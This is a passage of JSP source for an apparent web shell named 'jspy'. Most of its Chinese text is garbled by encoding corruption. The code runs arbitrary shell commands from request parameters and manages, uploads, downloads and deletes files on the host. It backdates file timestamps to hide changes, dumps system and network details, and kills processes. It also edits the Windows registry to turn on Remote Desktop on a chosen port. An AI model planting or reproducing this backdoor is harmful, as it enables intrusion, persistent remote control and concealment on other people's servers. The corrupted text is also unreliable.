out.print("' name=radiobutton><3E><>վ<EFBFBD><D5BE>Ŀ¼<C4BF><C2BC><EFBFBD><EFBFBD>");
File[] roots=File.listRoots();
for(int i=0;i<roots.length;i++){
out.print("<INPUT class=c type=radio value="+convertPath(roots[i].getPath())+" name=radiobutton>"+roots[i].getPath());
}
out.print("<br><br>");
out.print("<input type=\"submit\" value=\" <20><>ʼɨ<CABC><C9A8> \" style=\"background:#ccc;border:2px solid #fff;padding:2px 2px 0px 2px;margin:4px;\" />");
}
public void findFile(JspWriter out,String path,String filename)throws Exception{
File file = new File(path);
File[] list = file.listFiles();
String dfileName = filename ;
try{
for(int i=0;i<list.length;i++){
if(list[i].isDirectory()){
findFile(out,list[i].getPath(),dfileName);
}
else if(list[i].isFile()){
if(list[i].getName().equals(dfileName)){
out.print("<table width='100%' border=0> ");
out.print("<tr><td width='60%'>"+strCut(convertPath(list[i].getPath()),70)+"</td><td width='40%'><a href='javascript:JsReName(\""+convertPath(list[i].getPath())+"\",\""+convertPath(list[i].getPath())+"\");'><3E>ƶ<EFBFBD>&nbsp;&nbsp;</a><a href='javascript:JsCoypFile(\""+convertPath(list[i].getPath())+"\",\""+convertPath(list[i].getPath())+"\");'><3E><><EFBFBD><EFBFBD>&nbsp;&nbsp;</a><a href='?action=H&fileName="+convertPath(list[i].getPath())+"'><3E>༭&nbsp;&nbsp;</a><a <a href='?action=O&fileName="+convertPath(list[i].getPath())+"'><3E><><EFBFBD><EFBFBD>&nbsp;&nbsp;</a><a href='javascript:JsdelName(\""+convertPath(list[i].getPath())+"\");'>ɾ<><C9BE>&nbsp;&nbsp;</a><a href='javascript:setDate(\""+convertPath(list[i].getPath())+"\")'><3E><EFBFBD><E0BCAD><EFBFBD><EFBFBD>&nbsp;&nbsp;</a></td></tr>");
out.print("</table>");
}
}
}
}catch(Exception e){
}finally {
}
}
public void dateChange(String filename,String year,String month,String day,JspWriter out)throws IOException{
File f=new File(filename);
if(f.exists()){
Calendar calendar=Calendar.getInstance();
calendar.set(Integer.parseInt(year),Integer.parseInt(month),Integer.parseInt(day));
if(f.setLastModified(calendar.getTimeInMillis()))
out.print("<22><><EFBFBD><EFBFBD>ˮ<EFBFBD>Ƴǡ<C6B3><C7A1><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ʾ:<br><br>"+filename+" change success");
else
out.print(filename+"file date change error");
}else{
out.println("file not find!!!");
}
}
public static String getWindowsMACAddress() {
String mac = null;
BufferedReader bufferedReader = null;
Process process = null;
try {
process = Runtime.getRuntime().exec("ipconfig /all");// windows<77>µ<EFBFBD><C2B5><EFBFBD><EFBFBD><EFBFBD><EEA3AC>ʾ<EFBFBD><CABE>Ϣ<EFBFBD>а<EFBFBD><D0B0><EFBFBD><EFBFBD><EFBFBD>mac<61><63>ַ<EFBFBD><D6B7>Ϣ
bufferedReader = new BufferedReader(new InputStreamReader(process
.getInputStream()));
String line = null;
int index = -1;
while ((line = bufferedReader.readLine()) != null) {
index = line.toLowerCase().indexOf("physical address");// Ѱ<>ұ<EFBFBD>ʾ<EFBFBD>ַ<EFBFBD><D6B7><EFBFBD>[physical address]
if (index >= 0) {// <20>ҵ<EFBFBD><D2B5><EFBFBD>
index = line.indexOf(":");// Ѱ<><D1B0>":"<22><>λ<EFBFBD><CEBB>
if (index>=0) {
mac = line.substring(index + 1).trim();// ȡ<><C8A1>mac<61><63>ַ<EFBFBD><D6B7>ȥ<EFBFBD><C8A5>2<EFBFBD>߿ո<DFBF>
}
break;
}
}
} catch (IOException e) {
e.printStackTrace();
} finally {
try {
if (bufferedReader != null) {
bufferedReader.close();
}
} catch (IOException e1) {
e1.printStackTrace();
}
bufferedReader = null;
process = null;
}
return mac;
}
public void systemInfo(JspWriter out,HttpServletRequest request) throws Exception{
out.print("<table width=\"100%\" border=0>");
out.print("<tr><td colspan=\"2\"><div align=\"left\"><3E><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ϣ</div></td> </tr>");
//out.print("");
out.print("<tr> <td width=\"19%\"><3E><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD></td><td width=\"81%\">"+request.getServerName()+"</td></tr>");
out.print("<tr><td>ip<69><70>ַ</td><td>"+InetAddress.getLocalHost().getHostAddress()+"</td></tr>");
out.print("<tr><td><3E><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>˿<EFBFBD></td><td>"+request.getServerPort()+"</td></tr>");
out.print("<tr><td><3E><><EFBFBD><EFBFBD>ϵͳ</td><td>"+System.getProperty("os.name")+System.getProperty("os.version") + " " + System.getProperty("os.arch")+"</td></tr>");
out.print("<tr><td>MAC<41><43>ַ</td><td>"+getWindowsMACAddress()+"</td></tr>");
out.print("<tr> <td><3E><>ǰ<EFBFBD>û<EFBFBD><C3BB><EFBFBD></td><td>"+System.getProperty("user.name")+"</td></tr> ");
out.print("<tr> <td><3E><>ǰ<EFBFBD>û<EFBFBD>Ŀ¼</td><td>"+System.getProperty("user.home")+"</td></tr> ");
out.print("<tr><td><3E><>ǰ<EFBFBD>û<EFBFBD><C3BB><EFBFBD><EFBFBD><EFBFBD>Ŀ¼</td><td>"+System.getProperty("user.dir")+"</td> </tr>");
out.print("<tr><td><3E><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>·<EFBFBD><C2B7></td><td>"+request.getRealPath(request.getServletPath())+"</td> </tr>");
out.print("<tr><td><3E><><EFBFBD><EFBFBD>Э<EFBFBD><D0AD><EFBFBD>汾</td><td>"+request.getProtocol()+"</td></tr>");
//out.print("<tr><td><3E><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><E6B1BE>Ϣ</td><td>"+application.getServerInfo()+"</td> </tr>");
out.print("<tr><td>JDK<44>汾</td><td>"+System.getProperty("java.version")+"</td> </tr>");
out.print("<tr><td>JDK<44><4B>װ·<D7B0><C2B7></td><td>"+System.getProperty("java.home")+"</td></tr>");
out.print("<tr><td>JAVA<56><41><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>汾</td><td>"+System.getProperty("java.vm.specification.version")+"</td></tr> ");
out.print("<tr><td>JAVA<56><41><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD></td><td>"+System.getProperty("java.vm.name")+"</td></tr>");
out.print("<tr><td>JAVA<56><41>·<EFBFBD><C2B7></td><td>"+System.getProperty("java.class.path")+"</td></tr>");
out.print("<tr><td>ϵͳpath<74><68><EFBFBD><EFBFBD></td><td>"+System.getProperty("java.library.path")+"</td> </tr>");
out.print("<tr><td>JAVA<56><41>ʱĿ¼</td><td>"+System.getProperty("java.io.tmpdir")+"</td></tr>");
out.print("<tr> <td><3E><>չĿ¼·<C2BC><C2B7></td> <td>"+System.getProperty("java.ext.dirs")+"</td></tr>");
out.print("</table> ");
}
//<2F><><EFBFBD><EFBFBD>Զ<EFBFBD><D4B6><EFBFBD>ն˹<D5B6><CBB9><EFBFBD><EFBFBD><EFBFBD>ʱֻ֧<D6BB><D6A7>winXP<58><50>win2003
public String checkOs(){
return System.getProperty("os.name").toLowerCase();
}
public void popenTerm(JspWriter out) throws Exception{
out.print("<TABLE align='center' width='50%'><TR><TD align='center'><3E><><EFBFBD><EFBFBD>ϵͳ<CFB5>汾</TD><td>"+checkOs()+"</td>");
out.print("</TR><TR>");
out.print("<form method=post action='?action=W'>");
out.print("<TR><TD ><input type=radio name=terminal checked>win2003<30><33><EFBFBD><EFBFBD>3389</TD><TD></TD></TR>");
out.print("<TR><TD align='right'><3E>ն˶˿ں<CBBF></TD><TD><INPUT type=text name=p1 size=10 value=3389></TD><TD><input type=submit value=\"<22><><EFBFBD><EFBFBD><EFBFBD>ն<EFBFBD>\"></TD></TR>");
out.print("<TR><TD ><input type=radio name=terminal >winXp</TD><TD></TD></TR>");
out.print("<TD></TD>");
out.print("</form></TR></TABLE>");
}
public void openTrem(JspWriter out,String port1) throws Exception{
int j = Integer.parseInt(port1);
String dtohex = Integer.toHexString(j);
//out.print(hex2003);
String openxpOr2003[] = new String[]{
"reg add \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 0 /f",
"reg add \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\Wds\\rdpwd\\Tds\\tcp\" /v PortNumber /t REG_DWORD /d 0x"+dtohex+" /f",
"reg add \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp\" /v PortNumber /t REG_DWORD /d 0x"+dtohex+" /f"
};
if(checkOs().equals("windows xp")){
for(int i=0;i<openxpOr2003.length;i++){
out.print("<22>ն˷<D5B6><CBB7><EFBFBD><EFBFBD><EFBFBD>Ϣ:&nbsp;&nbsp;&nbsp;&nbsp;"+exeCmd(out,openxpOr2003[i])+"<br>");
}
}
else if(checkOs().equals("windows 2003")){
for(int i=0;i<openxpOr2003.length;i++){
out.print("<22>ն˷<D5B6><CBB7><EFBFBD><EFBFBD><EFBFBD>Ϣ:&nbsp;&nbsp;&nbsp;&nbsp;"+exeCmd(out,openxpOr2003[i])+"<br>");
}
}
}
//<2F><><EFBFBD><EFBFBD><EFBFBD>˿<EFBFBD>-<2D><><EFBFBD><EFBFBD>-<2D><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ܺ<EFBFBD><DCBA><EFBFBD>
public void pgetTcpUdp(JspWriter out,HttpServletRequest request)throws Exception{
//String nowCom = command;
out.print("<table align=center width=\"80%\" border=\"0\">");
out.print("<tr><td width=\"20%\"><3E>˿<EFBFBD><CBBF><EFBFBD><EFBFBD><EFBFBD></td><td width=\"30%\"><3E><><EFBFBD><EFBFBD>IP:<3A>˿<EFBFBD></td><td width=\"30%\"><3E>ⲿIP:<3A>˿<EFBFBD></td><td width=\"20%\"><3E>˿<EFBFBD>״̬</td></tr>\n");
getSinfo(out,request.getParameter("command"));
out.print("</table>");
}
public void pgetServer(JspWriter out,HttpServletRequest request)throws Exception{
// String nowCom = command;
out.print("<table align=center width=\"80%\" border=\"0\">");
out.print("<tr><td width=\"20%\"><3E><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD></td></tr>\n");
getSinfo(out,request.getParameter("command"));
out.print("</table>");
}
public void pgetTask(JspWriter out,HttpServletRequest request)throws Exception{
// String nowCom = command;
out.print("<table align=center width=\"80%\" border=\"0\">");
out.print("<tr><td width=\"30%\"><3E><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD></td><td width=\"30%\">PID<49><44></td><td width=\"30%\"><3E><><EFBFBD>ط<EFBFBD><D8B7><EFBFBD></td></tr>\n");
getSinfo(out,request.getParameter("command"));
out.print("</table>");
}
//<2F><>ȡ<EFBFBD>˿<EFBFBD>-<2D><><EFBFBD><EFBFBD>-<2D><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ϣ<EFBFBD><CFA2><EFBFBD><EFBFBD>
public void getSinfo(JspWriter out,String command) throws Exception{
// File file = _file;
int skipline = 0; //<2F><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ȡ<EFBFBD><C8A1><EFBFBD><EFBFBD>
try {
Process pro = null;
if(command.equals("netstat")){
pro = Runtime.getRuntime().exec("cmd.exe /c netstat -an");
skipline = 4;
}
else if(command.equals("netstart")){
pro = Runtime.getRuntime().exec("cmd.exe /c net start");
skipline = 2;
}
else if(command.equals("tasklist")){
pro = Runtime.getRuntime().exec("cmd.exe /c tasklist /svc");
skipline = 3;
}
BufferedReader br = new BufferedReader(new InputStreamReader(pro.getInputStream()));
//<2F><>forѭ<72><D1AD><EFBFBD><EFBFBD>ȡ<EFBFBD>ֽ<EFBFBD><D6BD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ָ<EFBFBD><D6B8><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
for (int i = 0; i < skipline; i++) {
br.readLine();
}
String buff = "";
while( (buff=br.readLine())!= null){
out.print("<tr>");
if(2!=skipline){//<2F><>ȡ<EFBFBD>˿ںͽ<DABA><CDBD><EFBFBD><EFBFBD><EFBFBD>Ϣ
StringTokenizer st = new StringTokenizer(buff);
while(st.hasMoreElements()){
String Info = st.nextToken();
out.print("<td >"+Info+"</td>");
}
}
else{//<2F><>ȡ<EFBFBD><C8A1><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ϣ
while((buff=br.readLine())!=null){
out.print("<tr><td >"+buff+"</td></tr>");
}
}
out.print("</tr>\n");
}
br.close();
// return buff;
} catch (Exception e) {
// return null;
}
}
//<2F><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>̺<EFBFBD><CCBA><EFBFBD>
public void pkillProc(JspWriter out) throws Exception{
out.print("<table width='100%' border='0'>");
out.print("<form id='form1' name='form1' method='post' action='?action=v'>");
out.print("<tr><td colspan='3'><3E><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>̹<EFBFBD><CCB9><EFBFBD> (<28><>ˮ<EFBFBD>Ƴ<EFBFBD><C6B3><EFBFBD>ʾ<EFBFBD><CABE><EFBFBD>ù<EFBFBD><C3B9>߱ȽϰԵ<CFB0><D4B5><EFBFBD>ʹ<EFBFBD><CAB9>Ҫ<EFBFBD><D2AA><EFBFBD>ء<EFBFBD>)</td></tr>");
out.print("<tr><td width='12%'><3E><><EFBFBD><EFBFBD>PID<49><44></td><td width='28%'><input type='text' name='killpid' /> </td>");
out.print("<td width='60%'><input type='submit' name='Submit' value='<27><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>' /></td> </tr>");
out.print("</form></table>");
}
public void killProc(JspWriter out,String Pid) throws Exception{
if(empchk(Pid)){
String exec = exeCmd(out,"taskkill /f /pid "+Pid);
out.print("<22><><EFBFBD><EFBFBD>ˮ<EFBFBD>Ƴǡ<C6B3><C7A1><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ʾ:<br><br>"+exec);
}
}
//ע<><D7A2><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ʱ<EFBFBD><CAB1><EFBFBD><EFBFBD><E1B9A9><EFBFBD>ڴ<EFBFBD><DAB4><EFBFBD>һ<EFBFBD><D2BB>V1.1<EFBFBD><EFBFBD><EFBFBD>:-)
public void pregedit(JspWriter out) throws Exception{
out.print("<p><3E><><EFBFBD><EFBFBD>ˮ<EFBFBD>Ƴǡ<C6B3><C7A1><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ʾ:<br><br>v1.0<EFBFBD><EFBFBD>ݲ<EFBFBD>֧<EFBFBD><EFBFBD>ע<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ܣ<EFBFBD><EFBFBD>ڴ<EFBFBD><EFBFBD><EFBFBD>һ<EFBFBD><EFBFBD>V1.1<EFBFBD><EFBFBD><EFBFBD>:-) </p>");
}
public void aboutJspy(JspWriter out) throws Exception{
out.print("&nbsp;&nbsp;&nbsp;&nbsp;<3B>ܾ<EFBFBD><DCBE><EFBFBD>ǰ<EFBFBD><C7B0><EFBFBD><EFBFBD>һ<EFBFBD><D2BB><EFBFBD><EFBFBD><EFBFBD>룬ϣ<EBA3AC><CFA3><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ϸ<EFBFBD><CFB7>һ<EFBFBD><D2BB><EFBFBD><EFBFBD>˼<EFBFBD><EFBFBD><E8B6AF><EFBFBD><EFBFBD>Ʈ<EFBFBD>ɣ<EFBFBD><C9A3><EFBFBD><EFBFBD>ǵ<EFBFBD><C7B5>ٴ<EFBFBD><D9B4><EFBFBD><EFBFBD>Է<EFBFBD><D4B7><EFBFBD><EFBFBD><EFBFBD><E4BEA1>ɲ<EFBFBD><C9B2><EFBFBD>Ҳŷ<D2B2><C5B7><EFBFBD><EFBFBD><EFBFBD>ʵ<EFBFBD><CAB5><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ǿ<EFBFBD>P<EFBFBD><50><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ѻ<EFBFBD><D1BA><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ɻ<EFBFBD><C9BB>ߡ<EFBFBD><DFA1><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ҿ<EFBFBD><D2BE><EFBFBD>һ<EFBFBD><D2BB><EFBFBD><EFBFBD><EFBFBD>˴<EFBFBD><CBB4>ĺ<EFBFBD><C4BA>ӣ<EFBFBD><D3A3>ڰ<EFBFBD><DAB0><EFBFBD>ʹ<EFBFBD>ı<EFBFBD>Եһֱ<D2BB>Ķ<EFBFBD><C4B6><EFBFBD><E4A1A3><EFBFBD>޾<EFBFBD><DEBE>ĵȴ<C4B5><C8B4><EFBFBD><EFBFBD>ڴ<EFBFBD><DAB4>˿ڵ<CBBF><DAB5><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Լ<EFBFBD><D4BC><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ѿ<EFBFBD><D1BF><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ժ󵱳<D4BA><F3B5B1B3><EFBFBD><EFBFBD><EFBFBD><E4B6A8>˲<EFBFBD><CBB2><EFBFBD><EFBFBD>ϣ<EFBFBD><CFA3><EFBFBD><EFBFBD><EFBFBD>ܿ<EFBFBD><DCBF><EFBFBD><EFBFBD>ҵIJ<D2B5><C4B2>ϡ<EFBFBD>wait for jhy......");
out.print("<br><br>&nbsp;&nbsp;&nbsp;&nbsp;<3B><><EFBFBD>а<EFBFBD><D0B0><EFBFBD><EFBFBD><EFBFBD>Ҫ<EFBFBD><D2AA>ҵ<EFBFBD>ˣ<EFBFBD><CBA3><EFBFBD>Ҫ<EFBFBD>ó<EFBFBD><C3B3><EFBFBD><E3B6AB><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ҵĴ<D2B5>ѧ<EFBFBD><D1A7><EFBFBD><EFBFBD><EFBFBD>ˣ<EFBFBD><CBA3><EFBFBD><EFBFBD><EFBFBD>һ<EFBFBD><D2BB><EFBFBD><EFBFBD><EFBFBD>µ<EFBFBD>ʱ<EFBFBD><CAB1>jspy V1.0<EFBFBD><EFBFBD><EFBFBD><EFBFBD>д<EFBFBD><EFBFBD><EFBFBD>ˣ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ĺ<EFBFBD><EFBFBD>ܶ<EFBFBD><EFBFBD>Ѿ<EFBFBD>ʵ<EFBFBD><EFBFBD><EFBFBD>ˣ<EFBFBD>ȱ<EFBFBD>ٵĹ<EFBFBD><EFBFBD><EFBFBD><EFBFBD>һ<EFBFBD><EFBFBD>ں<EFBFBD><EFBFBD><EFBFBD><EFBFBD>İ汾<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ӣ<EFBFBD>ϣ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ܹ<EFBFBD>һֱ<EFBFBD><EFBFBD>עjspy<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>o(<28><>_<EFBFBD><5F>)o...<2E><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>л<EFBFBD><D0BB><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ҫ<EFBFBD>õ<EFBFBD><C3B5>ֵ<EFBFBD>yizhigu<67>İ<EFBFBD><C4B0><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>MIAO<41><EFBFBD><E7A3AC><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>壬simeon<6F><6E><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ǻ<EFBFBD><C7BB><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ԭ<EFBFBD><EFBFBD><E3A3AC><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>С<E7A3AC>˸<CBB8><E7A3AC><EFBFBD><EFBFBD>ǣ<EFBFBD><C7A3><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>𾴵<EFBFBD>Lenk<6E><6B><EFBFBD><EFBFBD><EFBFBD>Լ<EFBFBD>LST<53><54><EFBFBD><EFBFBD><EFBFBD>ֵ<EFBFBD><D6B5>ǣ<EFBFBD>ϣ<EFBFBD><CFA3>LST<53>ߵij<DFB5>Զ<EFBFBD><D4B6><EFBFBD><EFBFBD><EFBFBD><EFBFBD>");
out.print("<br><br><div align=left>MADE by <20><>ˮ<EFBFBD>Ƴ<EFBFBD><br>QQ:540410588</div>");
}
%>
<BODY>
<style type="text/css">
body,td{font-size: 12px;background-color:#000000;color:#00ff00;}
table{T:expression(this.border='0',this.borderColorLight='white',this.borderColorDark='black')}
.ta{T:expression(this.border='1',this.borderColorLight='white',this.borderColorDark='black')}
input,select{font-size: 12px;}
body{margin-top:0px;margin-bottom:0px;margin-left:0px;margin-right:0px}
td{white-space:nowrap}
a{color:white;TEXT-DECORATION:none}
</style>
<STYLE>
.style1{background:beige url(sphere.jpg) no-repeat top center}
.style2{background:ivory url(sphere.jpeg) no-repeat bottom right}
</STYLE>
<%
String Action=request.getParameter("action");
char action;
action=(Action==null?"0":Action).charAt(0);
//action = 'M';
try{
switch(action){
case 'A':aboutJspy(out);break;
case 'E':pExeCmd(out,request);break;
case 'e':exeCmd(out,request.getParameter("cmd"));break;
case 'M': mainMenu(out,webSite_Folder,strAbsPath);break;
case 'L': loginOut(out,nowURI);break;
case 'S':listFolder(out,encodeChange(request.getParameter("FolderPath")));break;
case 'F':listRoot(out);
case 'N':newFolder(out,encodeChange(request.getParameter("FolderPath")));break;
case 'G':pnewFile(out,"MADE BY <20><>ˮ<EFBFBD>Ƴ<EFBFBD>\nQQ:540410588",webSite_Folder+"newFile.txt");break;
case 'g':newFile(out,encodeChange(request.getParameter("fileName")),request.getParameter("fileContent").getBytes("ISO-8859-1"),request.getParameter("choice"));break;
case 'H':peditFile(out,request.getParameter("fileName"));break;
case 'I':reName(out,encodeChange(request.getParameter("sFileName")),encodeChange(request.getParameter("FolderPath")));break;
case 'J':delName(out,encodeChange(request.getParameter("Filename")));break;
case 'K':copyName(out,encodeChange(request.getParameter("sFileName")),encodeChange(request.getParameter("FolderPath")));break;
case 'O':downFile(encodeChange(request.getParameter("Filename")),response);return;
case 'P':zip(out,encodeChange(request.getParameter("FolderPath")),encodeChange(request.getParameter("sFileName")));break;
case 'Q':findFile(out,encodeChange(request.getParameter("radiobutton")),encodeChange(request.getParameter("filename")));
case 'q':pfindFile(out,request);break;
case 'R':dateChange(encodeChange(request.getParameter("Filename")),encodeChange(request.getParameter("year")),encodeChange(request.getParameter("month")),encodeChange(request.getParameter("day")),out);break;
case 'T':uploadFile(out,request,convertPath(webSite_Folder));break;
case 't':pupfile(out,convertPath(webSite_Folder));break;
case 'U':systemInfo(out,request);break;
case 'B':pgetTcpUdp(out,request);
case 'V':pkillProc(out);break;
case 'v':killProc(out,request.getParameter("killpid"));break;
case 'x':pregedit(out);break;
case 'W':openTrem(out,request.getParameter("p1"));break;
case 'w':popenTerm(out);break;
case 'Y':pgetTask(out,request);break;
case 'Z':pgetServer(out,request);break;
default :
//listFolder(out,"D:\\Tomcat 5.0\\webapps\\test");break;
mainForm(out,webSite_Folder);break;
}
}catch(Exception e){
}
%>
<script language="javascript">
function JshowFolder(path){
top.document.address.action.value="S";
top.document.address.FolderPath.value=path;
top.document.address.submit();
}
function checkUrl(){
top.document.address.action.value="S";
top.document.address.submit();
}
function newFolder(Rpath){
var folderName = prompt("<22><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ҫ<EFBFBD><D2AA><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ȫ·<C8AB><C2B7><EFBFBD><EFBFBD>",Rpath+"newFolder");
if(confirm("<22><>ȷ<EFBFBD><C8B7>Ҫ<EFBFBD>½<EFBFBD><C2BD><EFBFBD><EFBFBD><EFBFBD>Ŀ¼<C4BF><C2BC>")){
top.document.address.action.value="N";
top.document.address.FolderPath.value=folderName;
top.document.address.submit();
}
else
return;
}
function JsReName(spath,dpath){
var newFolderName = prompt("<22><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ƶ<EFBFBD><C6B6><EFBFBD>Ŀ<EFBFBD><C4BF><EFBFBD>ļ<EFBFBD>ȫ<EFBFBD><C8AB><EFBFBD><EFBFBD>",dpath);
if(confirm("<22><>ȷ<EFBFBD><C8B7>Ҫ<EFBFBD>ƶ<EFBFBD><C6B6><EFBFBD>Ŀ<EFBFBD><C4BF><EFBFBD>ļ<EFBFBD><C4BC><EFBFBD>!")){
top.document.address.action.value="I";
top.document.address.FolderPath.value=newFolderName;
top.document.address.sFileName.value=spath;
top.document.address.submit();
}
else{
return;
}
}
function JsCoypFile(spath,dpath){
var newFolderName = prompt("<22><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ƶ<EFBFBD>Ŀ<EFBFBD><C4BF><EFBFBD>ļ<EFBFBD>ȫ<EFBFBD><C8AB><EFBFBD><EFBFBD>",dpath);
if(confirm("<22><>ȷ<EFBFBD><C8B7>Ҫ<EFBFBD><D2AA><EFBFBD>Ƶ<EFBFBD>Ŀ<EFBFBD><C4BF><EFBFBD>ļ<EFBFBD><C4BC><EFBFBD>!")){
top.document.address.action.value="K";
top.document.address.FolderPath.value=newFolderName;
top.document.address.sFileName.value=spath;
top.document.address.submit();
}
else{
return;
}
}
function JsdelName(path){
if(confirm("<22><>ȷ<EFBFBD><C8B7>Ҫɾ<D2AA><C9BE>Ŀ<EFBFBD><C4BF><EFBFBD>ļ<EFBFBD><C4BC><EFBFBD>!")){
top.document.address.action.value="J";
top.document.address.Filename.value=path;
top.document.address.submit();
}
}
function downFIle(path){
top.document.address.action.value="O";
top.document.address.Filename.value=path;
top.document.address.submit();
}
function zipFile(spath){
var dfile = prompt("<22><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ŀ<EFBFBD>ĵ<EFBFBD>ַ","c:/windows/temp/down.zip");
if(confirm("<22><>ȷ<EFBFBD><C8B7>Ҫ<EFBFBD><D2AA><EFBFBD>ص<EFBFBD>Ŀ<EFBFBD>ĵ<EFBFBD>ַ<EFBFBD><D6B7>!")){
top.document.address.action.value="P";
top.document.address.FolderPath.value=spath;
top.document.address.sFileName.value=dfile;
top.document.address.submit();
}
else{
return;
}
}
function setDate(file){
document.write("Change date:<br><form method='post' action='?action=R'>");
document.write("filename:<input name='Filename' type='text' size=60 readonly value='"+file+"'><br>");
document.write("Year:<select name='year'>");
for(i=1970;i<=2050;i++){
document.write("<option value="+i+">"+i+"</option>");
}
document.write("</select>");
document.write("Month:<select name='month'>");
for(i=1;i<=12;i++){
document.write("<option value="+i+">"+i+"</option>");
}
document.write("</select>");
document.write("Day:<select name='day'>");
for(i=1;i<=31;i++){
document.write("<option value="+i+">"+i+"</option>");
}
document.write("</select>");
document.write("<input name='Action' type='button' onclick='top.address.action.value=\"R\";this.form.submit();' value='dateChange'>");
document.write("<input name='cancel' onclick='history.back();' type='button' value='Cancel'>");
}
</script>
</body>
</html>